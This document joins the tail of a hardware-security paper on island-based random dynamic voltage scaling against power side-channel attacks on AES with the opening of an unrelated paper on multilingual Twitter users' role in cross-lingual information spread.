2017) We assume each island will have an on-chip DC/DC converter whose control will leverage the entropy from an off-the-shelf true random number generator (TRNG). This is similar to the random voltage generation proposed for random DVS (Krause et al., 2017; Krause et al., 2018; Krause et al., 2018). As was implemented in (Krause et al., 2017), we assume the TRNGs will be on-die and thus not directly accessible to power attacks. Determining the optimal number and configuration of independent voltages that not only thwarts voltage prediction but also retains the statistical merits of DVS is one of the key research objectives we explore here. ## 4. SNR Analysis The _signal-to-noise ratio (SNR)_ is typically used to quantify how well the secret portion of the computation is hidden within the overall power consumption (Krause et al., 2018). The SNR is defined as \(SNR=Var(AP)\) where \(AP\) denotes the power consumption associated with the intermediate value that carries secret information and \(N\) consists of the power consumption of uncorrelated computations and electronic noise. In this section, we examine the SNR of various island configurations to analyze their effectiveness. To simplify our analysis, we assume the traces are perfectly aligned; we analyze the misalignment benefit associated with iRDVS in the next section. The correlation between the hypothetical intermediate value and power traces can be derived in terms of SNR: \[\rho=\frac{\rho_{ap}}{\sqrt{1+\frac{1}{SNR}}} \tag{1}\] where \(\rho_{ap}\) denotes the correlation between the power consumption of the attacked part and the hypothetical intermediate value (Krause et al., 2018). This equation shows that a lower SNR leads to a lower correlation, which indicates higher robustness. Let \(T_{l}\) be a power trace for island \(i\) normalized by the voltage of that island. Let \(v_{i}\) denote the independent random dynamic supply voltage for island \(i\). Because the switching power is proportional to \(v^{\alpha}\), where \(\alpha\approx 2\), and most instantaneous power consumption is from switching power, the DVS power traces are proportional to \(v^{\alpha}T\). Let \(n\) denote the number of independent islands and \(m\) represent the number of independent voltages used. We present three different cases for comparison: first, the \(m=n\) independent DVS case, which means we assign a different random voltage to each island; then, the cases with two (\(m=2\)) and one (\(m=1\)) independent voltages. Without loss of generality, assume the first island is attacked, so the power consumption of the other \(n-1\) islands is switching noise. The SNR for \(m=n\) iRDVS islands (\(v_{1}\), \(v_{1}\), \(...\), \(v_{n}\)) can be represented as follows. Let \(\sigma\) and \(\mu\) denote the standard deviation and mean of their associated variables, respectively. Since \(v_{i}\) and \(T_{l}\) are independent of each other, we can expand the variance for both denominator and numerator. \[SNR_{m=n} =\frac{Var(v_{i}^{\alpha}T_{l})}{Var(\sum_{i=2}^{n}v_{i}^{\alpha }T_{l})} \tag{3}\] \[=\frac{\sigma_{\omega^{\alpha}_{1}}^{2}\sigma_{1}^{2}+\sigma_{ \omega^{\alpha}_{1}}^{2}H_{1}^{2}+\mu_{\omega^{\alpha}_{1}}^{2}\sigma_{1}^{2}} {\sum_{i=2}^{n}(\sigma_{\omega^{\alpha}_{i}}^{2}\sigma_{1}^{2}+\sigma_{\omega ^{\alpha}_{i}}^{2}\mu_{T_{i}}^{2}+\mu_{\omega^{\alpha}_{i}}^{2}\sigma_{1}^{2})} \tag{2}\] Considering the special case that variances and means of the island power consumption and supply voltages are the same, denoted \(\sigma_{T}^{2}\), \(\mu_{T}\), \(\sigma_{\omega^{\alpha}}^{2}\) and \(\mu_{\omega^{\alpha}}\), we obtain: \[SNR_{m=n}=\frac{\sigma_{\omega^{\alpha}}^{2}\sigma_{T}^{2}+\sigma_{\omega^{ \alpha}}^{2}\mu_{T}^{2}+\mu_{\omega^{\alpha}}^{2}\sigma_{T}^{2}}{(n-1)\sigma_ {\omega^{\alpha}}^{2}\mu_{T}^{2}+(n-1)(\mu_{\omega^{\alpha}}^{2}\sigma_{T}^{2} +\sigma_{\omega^{\alpha}}^{2}\sigma_{T}^{2})} \tag{4}\] Similarly, we can derive the SNR for the cases where \(m\) is equal to two (\(v_{1}\), \(v_{2}\)) and one (\(v\)) independent voltages, the latter modeling the conventional DVS approach. \[SNR_{m=2} =\frac{Var(v_{1}^{\alpha}T_{1})}{Var(v_{1}^{\alpha}\sum_{i=2}^{n} T_{l}+\omega_{i}^{\alpha}\sum_{i=2}^{n}T_{l})}\] \[=\frac{\sigma_{\omega^{\alpha}}^{2}\sigma_{T}^{2}+\sigma_{\omega^{ \alpha}}^{2}\mu_{T}^{2}+\mu_{\omega^{\alpha}}^{2}\sigma_{T}^{2}}{[(\frac{n}{2} -1)^{2}+(\frac{n}{2})^{2}]\sigma_{\omega^{\alpha}}^{2}\mu_{T}^{2}+(n-1)(\sigma _{\omega^{\alpha}}^{2}\sigma_{T}^{2}+\mu_{\omega^{\alpha}}^{2}\sigma_{T}^{2})} \tag{5}\] \[SNR_{m=1} =\frac{Var(v_{1}^{\alpha}T_{1})}{Var(v_{1}^{\alpha}\sum_{i=2}^{n} T_{l})}\] \[=\frac{\sigma_{\omega^{\alpha}}^{2}\sigma_{T}^{2}+\sigma_{\omega^{ \alpha}}^{2}\mu_{T}^{2}+\mu_{\omega^{\alpha}}^{2}\sigma_{T}^{2}}{(n-1)^{2} \sigma_{\omega^{\alpha}}^{2}\mu_{T}^{2}+(n-1)(\sigma_{\omega^{\alpha}}^{2} \sigma_{T}^{2}+\mu_{\omega^{\alpha}}^{2}\sigma_{T}^{2})} \tag{6}\] Due to the algebraic property that for \(a\geq 1\) and \(b\geq 1\), \((a+b)^{2}\geq a+b\), it can easily be shown that \(SNR_{m=n}\geq SNR_{m=2}\geq SNR_{m=1}\). This indicates that, somewhat counter-intuitively, without considering the misalignment and temporal advantage, a _lower_ number of DVS islands results in lower SNR, thereby lower correlation and higher robustness. We can explain this trend more generally from the perspective of covariance: \[Var(v_{i}^{\alpha}T_{l}+v_{j}^{\alpha}T_{j})= Var(v_{i}^{\alpha}T_{i})+Var(v_{j}^{\alpha}T_{j})+ \tag{8}\] \[2Cov(v_{i}^{\alpha}T_{i},v_{j}^{\alpha}T_{j}) \tag{7}\] The above equation is the general formula for computing the variance of two islands. If the two islands have the same supply voltage, i.e., \(v_{i}=v_{j}\), the two quantities \(v_{i}^{\alpha}T_{i}\) and \(v_{j}^{\alpha}T_{j}\) are correlated, therefore the covariance term \(Cov(v_{i}^{\alpha}T_{i},v_{j}^{\alpha}T_{j})\) is greater than zero. When the two islands have independent random voltages with possibly different means and variances, i.e., \(v_{i}\neq v_{j}\) where \(\sigma_{T}^{2}\), \(\mu_{T}\), \(\sigma_{\omega^{\alpha}}^{2}\) and \(\mu_{\omega^{\alpha}}\) are not equal, the two quantities \(v_{i}^{\alpha}T_{i}\) and \(v_{i}^{\alpha}T_{i}\) are also independent and \(Cov(v_{i}^{\alpha}T_{i},v_{j}^{\alpha}T_{j})=0\). This reduction in variance caused by an increasing number of supply voltages can be generalized to more islands. For the case of \(m=2\), the \(\frac{n}{2}\) noise islands supplied by \(v_{2}\) are correlated with one another, increasing the covariance terms in the denominator and decreasing the SNR. However, if we keep \(n\) constant and increase the number of voltage supplies \(m\), the correlation between islands reduces (increasing SNR) because fewer islands are correlated with each other. When \(m=n\), each island is powered by an independent supply so there is no covariance among noise islands. Therefore, the variance of the noise is minimized and the SNR is maximized for this \(n\). We experimentally verified this trend by performing CPA on a simplified model of AES that simulated the Sbox operations in the first round of AES. This model, given a plaintext, computes the 16 Sbox output values for the first round of AES and generates a power pulse with a peak amplitude corresponding to the sum of their Hamming weights and a fixed width. The results show that the peak correlations of the single-island and two-island cases are close, and as the number of independent voltages increases, the correlation also increases. However, the correlation for a small number of independent voltages (between 2 and 8) remains well below that observed without dynamic voltage scaling. ## 5. Alignment Analysis iRDVS and DVS introduce temporal advantages for attack resistance in addition to improving SNR by amplitude scaling. According to the Sakurai-Newton delay model (Sakurai and Newton, 1958; Newton, 1958), \(\tau=\frac{C_{L}V}{F(V-V_{T})^{\alpha}}\), the delay of the gates is closely related to the voltage supply. Assuming each independent voltage can change much faster than the duration of an attack, the power samples of the secret component will be shifted in time as the voltage changes. This means that the power samples associated with the secret operation, which were expected to be aligned, may be spread over a large range. The work in (Kumar et al., 2017) presents a relationship between misalignment and the correlation coefficient: \[\rho(H,v^{\alpha}T)=\rho(H,v^{\alpha}_{s}T_{s})*p*\sqrt{\frac{Var(v^{\alpha}_{s }T_{s})}{Var(v^{\alpha}T)}} \tag{8}\] where \(H\) represents the Hamming weight or Hamming distance matrix of the hypothetical intermediate value, \(v^{\alpha}T\) denotes the power consumption at a certain time, \(v^{\alpha}_{s}T_{s}\) refers to the portion of the power consumption caused by the secret operation, and \(p\) denotes the probability that the secret operation is consuming power at the attack time. Thus, \(\rho(H,v^{\alpha}_{s}T_{s})\) is the correlation for the case where the secret samples are perfectly aligned, whereas \(\rho(H,v^{\alpha}T)\) is the correlation for the full design with misalignment. Having one or more dynamic voltages would lead to a small \(p\) by reducing the probability that secret power samples are self-aligned. iRDVS and DVS reduce \(p\) and decrease the correlation coefficient, making CPA attacks more difficult. ## 6. Clustering Attack Many alignment techniques, including elastic alignment (Kumar et al., 2017), are based on a notion of a distance between traces. Power traces from similar operations can be aligned by minimizing the distance between them. Because voltage scaling increases the distance between operations, and multiple supplies add random noise, these techniques are ineffective when applied to our iRDVS approach, as we will show in Section 7. We propose to strengthen alignment attacks using a novel unsupervised ML-based algorithm that clusters the iRDVS traces into several groups that share similar voltage characteristics. After this clustering, we perform a CPA attack on every cluster and rank the possible subkeys based on their derived correlation coefficients, then average the rank of each possible subkey across all clusters and reorder the subkeys based on the average rank. This new rank order combines the information obtained from all individual attacks on all clusters. We pick the subkey with the lowest average rank to determine MTD, and determine PGE by the final rank of the correct subkey. We propose using the computationally efficient K-means clustering algorithm (Kumar et al., 2017) to group similar traces. This approach heuristically minimizes the distances among the power values of traces in each cluster. A critical parameter for K-means clustering is the number of clusters, which is generally set before the start of the clustering algorithm. We hypothesize that the number of clusters should match the number of different voltage combinations used in the trace set. In this way, each cluster will ideally contain traces from the same specific combination of voltages, ensuring the individual power samples containing the secret key are aligned. Note that having many clusters implies that the average number of traces in each cluster will be \(K\) times smaller, reducing the effectiveness of the individual CPA analysis on each cluster. This motivates the experimental analysis, presented in the next section, of a range of \(K\) values to find the optimal number of clusters. Interesting future work includes using machine learning to guide the choice of \(K\). ## 7. Simulation Results and Analysis This section describes how we evaluated the effectiveness of our iRDVS approach against alignment and CPA attacks. ### Trace Generation and Experiment Design We developed an in-house tool in Python to preprocess traces and perform CPA. Our tool converts power traces from various sources into a standard format, voltage scales the traces, and combines scaled traces to form synthetic iRDVS traces. It also performs CPA and clustering attacks on both the original and synthetic traces, and generates correlation coefficient, PGE, TVLA, and MTD metrics. The original traces used for scaling and combining in these experiments are open-source traces from a combinational 128-bit AES implemented and measured on the Sasebo-GII board by Northeastern University (Naras et al., 2017). We make each trace the power consumption of one voltage island. We use the Sakurai-Newton delay model (Sakurai and Newton, 1958) with \(\alpha=2\) to expand each sample in the original trace by interpolation, where \(V_{dd}\) for each island is randomly picked from the set \(\{0.6,0.7,0.8,0.9,1\}\). We then add the scaled traces together to form the synthetic traces of our iRDVS design. This sum approximates a pipelined implementation of AES where each round operates simultaneously. To reduce the computation time and increase the probability of disclosure, we also extract the general region of interest from the synthetic traces before running CPA. Note that the original traces are a set of \(100k\), so to generate two island traces, Figure 2. MTD and PGE iRDVS under clustering attack. Empty circles indicate unsuccessful attacks, whereas filled circles indicate successful attacks. half of the traces are used as signal islands while the other half are used as noise islands, combined into a total of \(50k\) traces. If we need more than \(50k\) traces, we repeat this process with different scaling and combining of both the signal and noise traces. This means that the \(50k\) signal plaintexts are repeated, but scaled differently and combined with different noise islands. For other multi-island traces, we applied similar methods to generate synthetic traces. ### Effectiveness of Elastic Alignment As described in Section 2, we tested preprocessing the traces using the open-source Python package _fastdtv_(Kal on several islands operating at once for obfuscation, which requires several encryptions to be in different stages of the AES pipeline at once. While the traditional non-specific fixed-vs-random TVLA test compares the encryption of one fixed plaintext with the encryption of one "random" plaintext, we changed that one encryption to 32 encryptions, with the plaintext of interest (either fixed or random) in the middle of those 32 encryptions and the 31 other plaintexts being random. This ensures that the pipeline is as full as possible. The TVLA analysis was performed on the entire duration of those 32 encryptions. Each trace thus comprises a few thousand samples, with the number of samples varying proportionally with the time the core takes to complete the 32 operations (typically between 5K and 15K samples). To account for traces being different lengths due to natural variation and due to different voltage supply levels affecting the speed of encryption, the traces were linearly interpolated to all be of the same length. Traces are split into two groups of the same number of encryptions, and the t-test is run on both groups, each comprising half of the fixed and half of the random traces. The test then compares the fixed and random traces in each group. The TVLA methodology recommends a confidence value C of 4.5, which means that any samples with t-scores < -4.5 or > 4.5 in both groups indicate that the device is insecure and "fails" with a confidence of 99.99%. To further demonstrate the strength of the iRDVS approach, the same analysis was performed for a C value of 2 and the results are summarized in Table 1. In particular, our TVLA analysis compared four cases: constant voltage, DVS, adjacent iRDVS, and alternating iRDVS, all running on the iRDVS AES core. The constant voltage case runs all encryptions at a constant of 0.8V. The DVS case keeps all islands at the same voltage but changes that voltage randomly to a value between 0.6V and 0.8V for every encryption batch. The adjacent and alternating iRDVS configurations use the full capability of the iRDVS core and change the voltage of each of the four power domains randomly and independently for every encryption batch. These adjacent and alternating cases extend the same cases from the simulation experiments to use four independent voltage domains rather than two. We predict that stages with similar delay maximize overlapping computation and minimize potential timing side channels. For this reason, every other flip-flop is transparent, creating seven pipeline stages, each with two rounds of AES and two voltage islands. ## 9. Conclusions and Future Work According to mathematical analysis and experimental results, the proposed island-based random DVS approach not only maintains the merits of DVS but also introduces misalignment that is resistant to advanced alignment techniques. The proposed unsupervised machine learning based attack is successful with three or fewer islands but increases in difficulty as the number of islands grows. This is in part because the number of voltage supply settings grows combinatorially with the number of independent voltages. An AES iRDVS chip was fabricated to demonstrate the security benefits of the approach, using the industry-accepted TVLA methodology and resulting metric. Further work can be done with larger sample sizes, and work can be done to separate encryption traces precisely so that individual encryptions can be analyzed with TVLA and attacked with CPA or other power analysis attacks. The DVS and adjacent and alternating island-based RDVS cases comprise only a small portion of the potential design space for the iRDVS AES core. Our future work includes finding the most secure configuration as well as finding the configurations that best balances security, performance, and power. Future efforts will also include the addition of voltage generation and randomization circuitry as part of the core. This will further improve the security of the system by reducing the attack surface of the core. ## 10. Acknowledgement This work, including the fabrication of the chip presented, was supported by DARPA under the "21 Century Cryptography" program and contract #HR001119C0070.
2304.03797
Bridging Nations: Quantifying the Role of Multilinguals in Communication on Social Media
Social media enables the rapid spread of many kinds of information, from memes to social movements. However, little is known about how information crosses linguistic boundaries. We apply causal inference techniques on the European Twitter network to quantify multilingual users' structural role and communication influence in cross-lingual information exchange. Overall, multilinguals play an essential role; posting in multiple languages increases betweenness centrality by 13%, and having a multilingual network neighbor increases monolinguals' odds of sharing domains and hashtags from another language 16-fold and 4-fold, respectively. We further show that multilinguals have a greater impact on diffusing information less accessible to their monolingual compatriots, such as information from far-away countries and content about regional politics, nascent social movements, and job opportunities. By highlighting information exchange across borders, this work sheds light on a crucial component of how information and ideas spread around the world.
Julia Mendelsohn, Sayan Ghosh, David Jurgens, Ceren Budak
2023-04-07T18:01:25Z
http://arxiv.org/abs/2304.03797v1
# Bridging Nations: ###### Abstract Social media enables the rapid spread of many kinds of information, from memes to social movements. However, little is known about how information crosses linguistic boundaries. We apply causal inference techniques on the European Twitter network to quantify multilingual users' structural role and communication influence in cross-lingual information exchange. Overall, multilinguals play an essential role; posting in multiple languages increases betweenness centrality by 13%, and having a multilingual network neighbor increases monolinguals' odds of sharing domains and hashtags from another language 16-fold and 4-fold, respectively. We further show that multilinguals have a greater impact on diffusing information less accessible to their monolingual compatriots, such as information from far-away countries and content about regional politics, nascent social movements, and job opportunities. By highlighting information exchange across borders, this work sheds light on a crucial component of how information and ideas spread around the world. 1 Footnote 1: Copyright © 2023, Association for the Advancement of Artificial Intelligence (www.aaai.org). All rights reserved. ## 1 Introduction Social media facilitates worldwide diffusion of many forms of content, such as pop culture memes, protest movements, and misinformation Bruns et al. (2013); Nissenbaum and Shifman (2018); Bridgman et al. (2021). However, most connections on social media are formed between people who share a common nationality or language Ugander et al. (2011); Takhteyev et al. (2012). How can information spread around the world when relatively few ties cross geographic and linguistic boundaries? Multilingual users are believed to be an important piece of this puzzle, but understanding how they act as brokers in information flow across language communities remains underexplored Hong et al. (2011). We carry out a set of causal inference studies to quantify how multilingual users influence cross-lingual information exchange across Europe on Twitter and show that the role of multilingual users varies depending on the relationship between countries and the topic of content shared. We identify multilinguals based on the languages of their authored posts and avoid making claims about users' offline language competencies, which is an ideologically and theoretically fraught notion Cheng et al. (2021). Using this operationalization of multilingual, prior work has found that multilingual users tend to have ties (e.g., following links) to multiple distinct language communities, suggesting that they act as bridges in online social networks Eleta and Golbeck (2012); Hale (2014). We expand upon earlier population-level descriptive work by using causal inference techniques, namely propensity score stratification, to more robustly isolate the effects of individual users' multilingual behaviors on several outcomes. This approach is motivated by recent work showing propensity score stratification aligns with experimental results when measuring peer effects in link sharing behavior on social media Eckles and Bakshy (2020). We carry out two analyses using this framework. First, we measure the **structural role** of multilinguals. Here, we quantify the extent to which these users act as bridges using betweenness centrality Freeman (1978). We then measure multilingual users' **communication influence**. To do so, we ask how having a multilingual contact impacts the content, specifically URL domains and hashtags, that monolingual users share from other languages. By analyzing information spread across country pairs Figure 1: Consider networks of users from pairs of countries \((C_{x},C_{y})\) (e.g. Germany and Turkey) with dominant languages \(L_{x}\) and \(L_{y}\) (e.g. German and Turkish). Here, multilingual user A posts in both languages. We use causal inference to quantify (i.) the structural role and (ii.) the communication influence of A in cross-lingual information exchange. with different dominant languages, we show how multilingual' influence varies based on relationships between countries. Takhteyev et al. (2012) suggest that offline country relationships (e.g., economic agreements or migration patterns) impact transnational tie frequency online. Extending this conjecture, we hypothesize that the role of multilinguals is not uniform across all country pairs. Specifically, we expect multilinguals to have a bigger impact on country pairs that are more geographically distant or have weaker bonds, in which case these users would serve as gatekeepers of otherwise inaccessible information. We additionally consider actual content, which affects the rate and shape of information diffusion Romero et al. (2011); Tsur and Rappoport (2012). However, this cannot be captured by analyses of network structure alone. Our measures of multilinguals' communication influence overcome this limitation by enabling us to compare effects across content topics. We again hypothesize multilingual users play a larger role in spreading content otherwise inaccessible to an international audience. For example, we expect multilinguals to have a bigger influence on spreading hashtags about local or national politics compared to widespread entertainment sensations. Our contributions are as follows: in large-scale causal inference studies of European Twitter, we show that multilingually-posting users play a vital structural role and communication influence on information diffusion across languages. We compare how multilinguals' influence varies based on relationships between countries and find they have a greater effect among country pairs that are more geographically distant, especially for Western Europeans who post in Eastern European languages. We further measure how the effect of multilinguals is driven by content topic and find that they have the largest influence in spreading content about politics, developing health-related social movements, and job opportunities. Understanding how multilinguals affect information diffusion has immense consequences for online platforms. For example, platforms may focus efforts on empowering multilingual users to spread information that can support knowledge-sharing, collaboration, crisis response, social progress, or other beneficial outcomes Eleta and Golbeck (2014). On the other hand, they may want to discourage multilinguals from sharing dangerous content such as misinformation or abuse. ## 2 Related Work We draw upon prior work on multilinguals' online behavior and information diffusion across social networks. ### Social networks and information diffusion Online social networks tend to have relatively few ties connecting distinct national and linguistic communities, leading to structural holes Ugander et al. (2011); Hale (2012). Spreading novel information across these communities thus relies on bridges that span structural holes Easley and Kleinberg (2010). Information spreads the most quickly across long-range bridges, where the intermediary node greatly reduces the shortest path between two other nodes Kossinets et al. (2008). Bridges in a social network play a brokering role that adds to their social capital Burt (2004). We posit that multilinguals play an important role in cross-lingual information exchange because they serve as bridges between language communities. Prior work measures how people influence others to propagate information Guille et al. (2013). For example, people are more likely to share information their friends share, and overall, weak ties (e.g., acquaintances) are more responsible for spreading novel information than strong ties (e.g., close friends) Bakshy et al. (2012). Although multilinguals are not necessarily weak ties, they similarly can act as bridges between communities. Methodologically, we draw from Eckles and Bakshy (2020), who use causal inference techniques, namely propensity score stratification, to measure peer influence on link-sharing behavior and show that their observational estimates are consistent with experimental results. Understanding information diffusion and influential brokers impacts research across disciplines, including the development of activism and protest movements Gonzalez-Bailon et al. (2011); Park et al. (2015); Lee and Murdie (2020), spread of misinformation Bridgman et al. (2021), product adoption Talukdar et al. (2002), and online abuse Sporlein and Schlueter (2021). ### The bridging role of multilinguals Prior work has analyzed connections within and across language communities online Hale (2012, 2014); Samoilenko et al. (2016). Hale (2014) argues that multilingual editors on Wikipedia are important for sharing knowledge across language communities and facilitate access to more diverse knowledge; they are more active than their monolingual counterparts overall and often write the same article across multiple language versions. However, Kim et al. (2016) suggests that language remains a barrier because multilinguals are less engaged and less likely to edit complex content in a non-primary language. While online bloggers primarily link to content within the same language, cross-lingual links do exist, and some bloggers explicitly seek to connect distinct language communities Zuckerman (2008); Hale (2012). Authors of blogs that bridge language communities often tend to be multilingual migrants or language learners Herring et al. (2007). On Twitter, multilinguals disseminate information across different public spheres during events such as the Arab Spring Bruns et al. (2013). Earlier work has also examined the structural role of multilinguals. Kim et al. (2014) count edges between monolingual and multilingual "lingua" groups within multilingual regions on Twitter. They find that monolingual groups tend to be connected via multilingual groups, suggesting that multilingual users are bridges between different language communities. Hale (2014) similarly argues that multilinguals collectively play an important bridging role in the Twitter network. When removing all multilingual nodes, the largest connected component becomes smaller and the number of small components increases, and these changes are significantly larger than if the same number of randomly-selected monolinguals were removed Hale (2014). Eleta and Golbeck (2012, 2014) characterize multilingual users' ego-networks as gatekeepers (language communities connected by only a few users) and language bridges (tightly-connected language groups). The authors suggest that gatekeepers are essential individuals for spreading information across linguistic, national, and cultural boundaries. Other work has measured multilinguals' participation in information cascades (resharing chains) on Twitter. Jin (2017) find that multilingual behaviors of the original poster and their followers are predictive of information cascades crossing languages. Chen et al. (2021) compare monolingual and multilingual users in cascade trees of COVID-19 information, develop measures that capture users' bridging roles based on how much they propagate information, and find that multilinguals have a bigger bridging role than monolinguals in nearly two-thirds of information cascades. We build upon prior work in several important ways. While structural analyses suggest that multilinguals are important for cross-lingual information exchange, our causal inference studies quantify the effect of multilingual behaviors on both structural and content-sharing outcomes while accounting for possible confounds such as posting frequency and overall popularity. We further extend the evidence that online multilingual behaviors and connections vary across countries by identifying systematic variation in the effect of multilinguality across country pairs (Kim et al., 2014). ## 3 Data We construct an undirected network with Decahose data from 2012-2020, where edges are mutual "mentions" between users. We consider all pairs of European countries \((C_{x},C_{y})\) with dominant languages \(L_{x}\) and \(L_{y}\), and select countries based on geography and Eurovision participation, a marker of cultural affiliation. Using location inference (Compton, Jurgens, and Allen, 2014), we extract network subsets for all \((C_{x},C_{y})\) pairs where nodes are users from \(C_{x}\) or \(C_{y}\). We use tweets from 2018-2020 for multilingualism and content measures due to limited text availability. DefinitionsEach pair of countries \((C_{x},C_{y})\) is a _multilingual country pair (MCP)_ with dominant languages \(L_{x}\) and \(L_{y}\). Users who post only in \(L_{x}\) are \(L_{x}\)_monolinguals_ and users who post in both \(L_{x}\) and \(L_{y}\) are \((L_{x},L_{y})\)_multilinguals_. Within each \((C_{x},C_{y})\) network we separately measure the role of \((L_{x},L_{y})\) multilinguals located in \(C_{x}\) and \(C_{y}\), which we refer to as _loci_. In Figure 1, _(Germany, Turkey)_ is an MCP, and we measure the role of _(German, Turkish)_ multilinguals within each locus _Germany_ and _Turkey_. Language identificationTwitter posts present a challenge to automated language identification (LangID) due to their short length, informal style, and lack of ground truth labels (Graham, Hale, and Gaffney, 2014; Williams and Dagli, 2017). We use Twitter's built-in language detector because it is computationally efficient for a massive dataset, requires few additional resources, and is trained on in-domain data.1 Footnote 1: [https://blog.twitter.com/engineering/en_us/a/2015/](https://blog.twitter.com/engineering/en_us/a/2015/) evaluating-language-identification-performance We validate our decision with a comparison to 5 popular LangID packages: langdetect2, langid.py (Lui and Baldwin, 2012), and CLD23 use probabilistic models, while fastText (Joulin et al., 2016) and CLD34 use neural networks. As in prior LangID evaluations, we randomly sample 1K tweets from 32 countries written in that country's dominant language, as labeled by Twitter (Graham, Hale, and Gaffney, 2014; Lamprinidis et al., 2021). Like Graham, Hale, and Gaffney (2014), we calculate intercoder agreement between all pairs of models. Table S3 (Supplemental Material) shows that Twitter's LangID has a high agreement with other models, even at higher rates than they agree with each other. Footnote 2: [https://github.com/shuyo/language-detection](https://github.com/shuyo/language-detection) Footnote 3: [https://github.com/CLD2Owners/cld2](https://github.com/CLD2Owners/cld2) Footnote 4: [https://github.com/google/cld3](https://github.com/google/cld3) Like most LangID models, Twitter's LangID has relatively low coverage of the world's languages and may struggle to distinguish similar languages (Lui and Baldwin, 2014; Williams and Dagli, 2017). We mitigate these limitations by selecting multilinguals and MCPs so that our analyses are not overly sensitive to individual prediction errors. Identifying multilingual usersFollowing Eleta and Golbeck (2014), an individual uses language \(L\) if at least 10% of their posts containing original content are written in \(L\) (i.e., excluding retweets but including quote tweets and replies). A user is _monolingual_ if one language passes the 10% threshold, and _multilingual_ in the \((C_{x},C_{y})\) network if both \(L_{x}\) and \(L_{y}\) pass this threshold. Following Kim et al. (2014), we collect language information for all users with at least five posts in the Decahose. We additionally exclude users if over 20% of their tweets are in unidentified languages because our calculations for language use may be less accurate. We set these thresholds so that estimates of users' multilingualism are more reliable and robust to language prediction errors of individual tweets. We emphasize that our operationalization of multilingualism is based solely on users' expression on Twitter; we do not make claims about language knowledge or offline behavior. Selecting network subsets for analysisFrom an initial set of 50 European countries, we exclude 18 after three filtering steps. First, we remove six micro-states with area under 500km\({}^{2}\) because Compton, Jurgens, and Allen (2014)'s reported errors suggest that location inference is less reliable within such small areas. Second, we restrict our analysis to countries with a single official or dominant language (i.e., used by at least 70% of the population), removing eight more countries.5 This step is necessary for our problem formulation, which focuses on information spread across borders. The study of users within highly-multilingual countries is beyond the scope of this paper. Third, we calculate the distribution of tweets authored by users from each country and exclude four countries where the majority of tweets' languages are unidentified or no tweets are identified as written in the country's dominant language. See Supplemental Material Table S1 for the list of included and filtered countries. We include an MCP \((C_{x},C_{y})\) if: (1) \(C_{x}\) and \(C_{y}\) have different dominant languages, and (2) the \((C_{x},C_{y})\) network is sufficiently large to rigorously estimate causal effects. Specifically, an MCP network is included if it has at least 100 \(L_{x}\) and \(L_{y}\) monolinguals, 20 \((L_{x},L_{y})\) multilingual, and 100 users with at least 1 \((L_{x},L_{y})\) multilingual neighbor.6 See Supplemental Material Table S2 for included MCPs. Footnote 6: While we deem such thresholds necessary for precise causal effect estimation, we acknowledge the arbitrariness of these numbers as a limitation of our study. Descriptive statisticsOur dataset contains information for 12.6M users from 32 countries. 8.0M users pass the thresholds for posting activity and language identifiability and are considered for analysis. Of these users, 1.1 million (13.6%) tweet in both their country's dominant language and another European language. Norway has the largest percentage of bilingual users (46.9%), while the United Kingdom has the least (3.3%). 232 MCP network subsets were selected based on our inclusion criteria, covering 30 European countries and 7.7 million unique users (Georgia and Moldova were considered, but no MCP network containing these countries was included). MCP networks range in size from 4.7K nodes _(Latvia, Lithuania)_ to 3.6M nodes _(United Kingdom, Turkey)_, with a median size of 319K nodes. ## 4 Problem Formulation Adopting the Neyman-Rubin framework of potential outcomes Holland (1986), we isolate the effect of multilingual by addressing the counterfactual: how would a multilingual user \(u\)'s influence be different if \(u\) were monolingual? Each study's details vary (Table 1), but all have the same idea: we define a set of _units_ (users), some of whom receive a _treatment_ indicating multilingual behavior, and we estimate an _outcome_ variable related to influence on information exchange across languages. ### Measures of influence Are multilinguals well-positioned in networks to spread information? In Study 1, we quantify their structural role by estimating the effect of multilingual posting on betweenness centrality. A measure of the proportion of shortest paths that must go through an intermediary node, betweenness centrality quantifies the extent to which the intermediary is an information broker (Freeman, 1978). Studies 2 and 3 focus on multilingual' influence on content flows across languages. If an \(L_{x}\) monolingual has a multilingual neighbor in the \((C_{x},C_{y})\) network, how much more likely are they to share \(L_{y}\) content? We consider two forms of content: URL domains and hashtags Hong (2011). Betweenness centrality (Study 1)For each \((C_{x},C_{y})\) MCP, we consider a sample of users from locus \(C_{x}\) who post in \(L_{x}\). The treatment is if a user is multilingual in \((L_{x},L_{y})\), and the outcome is the user's betweenness centrality in the \((C_{x},C_{y})\) network, scaled by \(10^{6}\) and log-transformed. Domain sharing (Study 2)We first identify URL domains associated with each language. We filter out the 200 overall most-frequent domains. Like stop word removal Jurafsky and Martin (2000), excluded domains are largely uninformative for measuring content sharing across languages (e.g. _instagram.com_, _unfollowspy.com_). To account for sampling variability, we exclude domains that appear fewer than ten times Monroe et al. (2008). We then consider "domains associated with \(L_{x}\)" to be the 100 domains most overrepresented in \(L_{x}\) tweets (excluding retweets) relative to all European tweets based on the weighted log odds ratio with an informative Dirichlet prior Monroe et al. (2008). For each MCP \((C_{x},C_{y})\) and locus \(C_{x}\), the sample is the set of \(L_{x}\) monolinguals from \(C_{x}\). A user \(u\) is treated if they have at least one \((L_{x},L_{y})\) multilingual neighbor, and the outcome is whether any of \(u\)'s Decahose tweets contain at least one domain associated with \(L_{y}\), the language \(u\) does _not_ use. Note that we exclude retweets \begin{table} \begin{tabular}{l c c c} \hline & Structural Role & \multicolumn{2}{c}{Communication Influence} \\ \hline \hline & Study 1 & Study 2 & Study 3 \\ \hline \multirow{2}{*}{Units} & \(C_{x}\) users & Monolinguals & Monolinguals \\ & posting in \(L_{x}\) & in \(L_{x}\) from \(C_{x}\) & in \(L_{x}\) from \(C_{x}\) \\ \hline \multirow{2}{*}{Treatment} & Posting & \multirow{2}{*}{\begin{tabular}{c} Having \(\geq 1\) \\ \((L_{x},L_{y})\) multilingual \\ neighbor \\ \end{tabular} } & \multirow{2}{*}{\begin{tabular}{c} Having \(\geq 1\) \\ \((L_{x},L_{y})\) multilingual \\ neighbor \\ \end{tabular} } & \multirow{2}{*}{ \begin{tabular}{c} Having \(\geq 1\) \\ \((L_{x},L_{y})\) multilingual \\ neighbor \\ \end{tabular} } \\ \hline \hline \multirow{2}{*}{Outcome} & Betweenness & Sharing domain & Sharing hashtag \\ & centrality & from \(L_{y}\) & from \(L_{y}\) \\ \hline \end{tabular} \end{table} Table 1: Overview of problem formulation for causal inference studies. Each study focuses on the effect of multilingual on cross-lingual information exchange, but defines different samples, treatments, and outcomes. Figure 2: General design for causal inference studies Ho et al. (2007); Stuart (2010). We first estimate the propensity of each unit to receive treatment and use these scores to divide the sample into 25 strata. We then compare treated and untreated units within 